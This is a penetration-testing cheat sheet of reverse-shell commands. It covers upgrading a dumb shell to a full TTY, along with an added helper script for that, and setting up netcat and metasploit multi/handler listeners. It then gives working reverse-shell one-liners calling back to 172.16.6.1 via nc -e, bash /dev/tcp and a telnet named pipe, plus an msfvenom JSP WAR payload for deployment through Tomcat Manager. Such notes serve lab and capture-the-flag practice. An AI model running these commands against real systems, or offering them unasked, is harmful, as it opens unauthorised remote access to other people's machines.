#find which python interpreter is installed on the target
which python3
which python
#use whichever version of python is installed
python3 -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
#set the terminal type so clear, tab completion and other terminal-aware programs work
export TERM=xterm
#background remote shell
CTRL+Z
#on your local station (the remote shell is now suspended)
stty raw -echo;fg
ENTER Twice
stty -a #on the local shell, note the rows and columns values
#on the remote session, set the same size so full-screen programs render correctly
stty rows 61 cols 116 #replace 61 and 116 with your local values
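Local-side helpers for the TTY upgrade above, added here as an example (this is not part of the original notes). pick_python() does what `which python3`/`which python` do, taking the candidate names as arguments; pty_spawn_cmd() prints the pty one-liner for the interpreter found; stty_sync_cmd() turns the local `stty -a` or `stty size` output into the exact "stty rows R cols C" line to paste into the remote shell. The function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original notes: local-side helpers for the
# TTY upgrade. Function names are this example's own.

# pick_python NAME... -> prints the first NAME that exists on PATH, else returns 1
pick_python() {
    for p in "$@"; do
        if command -v "$p" >/dev/null 2>&1; then
            printf '%s\n' "$p"
            return 0
        fi
    done
    return 1
}

# pty_spawn_cmd INTERP -> the pty.spawn one-liner to run in the dumb remote shell
pty_spawn_cmd() {
    printf '%s\n' "$1 -c 'import pty;pty.spawn(\"/bin/bash\");'"
}

# stty_sync_cmd OUTPUT -> "stty rows R cols C" for the remote session.
# OUTPUT is either `stty -a` output ("speed 38400 baud; rows 61; columns 116; ...")
# or `stty size` output ("61 116"); returns 1 if no size can be parsed.
stty_sync_cmd() {
    case "$1" in
        *rows*)
            rows=$(printf '%s\n' "$1" | sed -n 's/.*rows \([0-9][0-9]*\);.*/\1/p')
            cols=$(printf '%s\n' "$1" | sed -n 's/.*columns \([0-9][0-9]*\);.*/\1/p')
            ;;
        *)
            rows=${1%% *}
            cols=${1##* }
            ;;
    esac
    # both values must be present and purely numeric
    case "$rows$cols" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ -n "$rows" ] && [ -n "$cols" ] || return 1
    printf 'stty rows %s cols %s\n' "$rows" "$cols"
}

# Demo: print the remote-side commands for this terminal (skipped when not on a tty)
if [ -t 0 ]; then
    py=$(pick_python python3 python) && pty_spawn_cmd "$py"
    stty_sync_cmd "$(stty size 2>/dev/null)" || echo "could not read terminal size" >&2
fi
```

Source this file in the local shell and run `stty_sync_cmd "$(stty size)"` after the `stty raw -echo;fg` step; paste the printed line into the remote session instead of reading the numbers off `stty -a` by hand.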
Reverse Shells
Listeners
nc -nlvp 9001
Always set up a netcat listener before executing a bash reverse shell
You can also use multi/handler from metasploit to catch incoming reverse shells
msfconsole
use exploit/multi/handler
set LHOST 172.16.6.1
set LPORT 9001
run
Netcat Reverse Shell
nc 172.16.6.1 9001 -e /bin/sh
Classic netcat reverse shell. The -e flag only exists in traditional netcat (nc.traditional) and in ncat; the OpenBSD netcat that most Linux distributions install as nc has no -e, so this fails there and you need the bash or named-pipe variants below.
Bash Reverse Shells
Good first attempt at a shell, and the bash reverse shell option with the highest success rate.
bash -i >& /dev/tcp/172.16.6.1/1234 0>&1
Uses bash's /dev/tcp pseudo-device, so the target needs bash (sh/dash have no /dev/tcp). The listener must be on the same port as the callback (1234 here, not 9001).
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.6.1 LPORT=1234 -f war > /home/kali/Documents/shell.war
This generates a WAR file containing a JSP reverse shell for deployment on Apache Tomcat through the Tomcat Manager application ("WAR file to deploy"). Start the handler first, then click the deployed application's link in the Manager's application list to run the JSP and trigger the callback.
Catch this shell with multi/handler or just nc
msfconsole
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set LHOST 172.16.6.1
set LPORT 1234
run
Reverse shell over the Telnet Protocol
mknod a p; telnet 172.16.6.1 1234 0<a | /bin/sh 1>a
This reverse shell uses mknod a p to create a named pipe (a FIFO, not a character device) called a in the current directory. telnet connects back to the listener and reads its stdin from the pipe, while its stdout (whatever you type on the listener) is piped into /bin/sh; the shell's stdout is written back into the pipe (1>a), which telnet sends to you. Only stdout comes back, so errors are invisible unless you add 2>&1 after 1>a. Remove the pipe (rm a) when you are done. Useful when the target has telnet but its nc lacks -e.